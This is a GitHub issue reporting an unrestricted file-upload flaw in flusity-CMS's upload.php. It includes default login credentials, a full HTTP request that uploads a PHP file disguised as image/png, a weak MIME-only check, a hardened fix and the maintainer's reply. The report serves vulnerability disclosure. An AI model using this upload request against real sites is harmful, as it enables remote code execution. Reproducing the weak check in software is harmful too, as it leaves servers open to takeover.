flusity / flusity-CMS

MIT License

Unrestricted Upload of File with Dangerous Type in upload.php #4

Open gtqbhksl opened 11 months ago

gtqbhksl commented 11 months ago

After installation, log in to the backend using the default account and password tester/1234, then select files [image]

Select upload_file [image]

Intercept traffic packets, modify filename to a PHP file name suffix, and change the content to PHP code.

[image]

```http
POST /core/tools/upload.php HTTP/1.1
Host: xxxxx
Content-Length: 164075
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://fluency
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryiAY81e4VlxYZXQEi
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://fluency/core/tools/files.php
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=k2l9ec3hfjhj2f19d5lml13qal
Connection: close

------WebKitFormBoundaryiAY81e4VlxYZXQEi
Content-Disposition: form-data; name="uploaded_file"; filename="a.php"
Content-Type: image/png

<?php echo "20231025";?>
------WebKitFormBoundaryiAY81e4VlxYZXQEi--
```

View uploaded files [image]

Execute PHP code correctly [image]

On line 15 of upload.php:

```php
$allowed_file_types = [
    'image/png', 'image/jpeg', 'image/gif', 'application/pdf',
    'application/msword', 'application/vnd.ms-excel',
    'application/vnd.openxmlformats-officedocument.wordprocessingml.document',
    'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
];
$max_file_size = 5 * 1024 * 1024;

$file_id = handleFileUpload($db, $prefix['table_prefix'], $target_dir, $allowed_file_types, $max_file_size);
```

It is not enough to filter file_types; you need to filter the file name.
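The weakness the report points at, as an added example that is not flusity-CMS code: handleFileUpload() is not shown in the issue, so weakCheck() is a hypothetical reconstruction of a filter that only consults the MIME allowlist (the client-supplied part Content-Type, which the PoC sets to image/png), while hardenedCheck() shows what filtering the file name looks like in practice. The constructed $_FILES entry mirrors the PoC part; the weak filter lets it through, the hardened one rejects it.

```php
<?php
// Added example, not flusity-CMS code. handleFileUpload() is not shown in the
// issue, so weakCheck() is a hypothetical reconstruction of a filter that only
// consults the allowed MIME list; hardenedCheck() shows what "filter the file
// name" means in practice.

$allowed_file_types = ['image/png', 'image/jpeg', 'image/gif', 'application/pdf'];
$allowed_extensions = ['png' => 'image/png', 'jpg' => 'image/jpeg',
                       'jpeg' => 'image/jpeg', 'gif' => 'image/gif',
                       'pdf' => 'application/pdf'];

// Weak: $_FILES[...]['type'] is just the Content-Type the client wrote in the
// multipart part. The PoC says image/png while naming the file a.php, so this
// passes and a.php is stored under the web root.
function weakCheck(array $file, array $allowed_file_types): bool
{
    return in_array($file['type'], $allowed_file_types, true);
}

// Hardened: allowlist the extension of the client filename, sniff the MIME
// type from the bytes on disk, require the two to agree, and store under a
// fresh random name so the client never controls the path.
function hardenedCheck(array $file, array $allowed_extensions): ?string
{
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!isset($allowed_extensions[$ext])) {
        return null;                            // a.php, a.phtml, a.png.php
    }
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $real  = $finfo->file($file['tmp_name']);  // from content, not the header
    if ($real !== $allowed_extensions[$ext]) {
        return null;                            // PHP source renamed to a.png
    }
    return bin2hex(random_bytes(16)) . '.' . $ext;
}

// Constructed $_FILES entry mirroring the PoC's multipart part.
$tmp = tempnam(sys_get_temp_dir(), 'up');
file_put_contents($tmp, '<?php echo "20231025";?>');
$poc = ['name' => 'a.php', 'type' => 'image/png', 'tmp_name' => $tmp, 'size' => 24];

var_dump(weakCheck($poc, $allowed_file_types));       // accepted by the MIME-list-only filter
var_dump(hardenedCheck($poc, $allowed_extensions));   // rejected by the hardened filter
unlink($tmp);
```

Because the stored name is generated server-side, double-extension tricks against the client filename never reach the web server's handler mapping; serving uploads from a directory with script execution disabled closes the remaining gap.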

flusity commented 11 months ago

Thanks for the note; the handleFileUpload function that works with upload.php has been updated.


-- Best regards,

Darius Jakaitis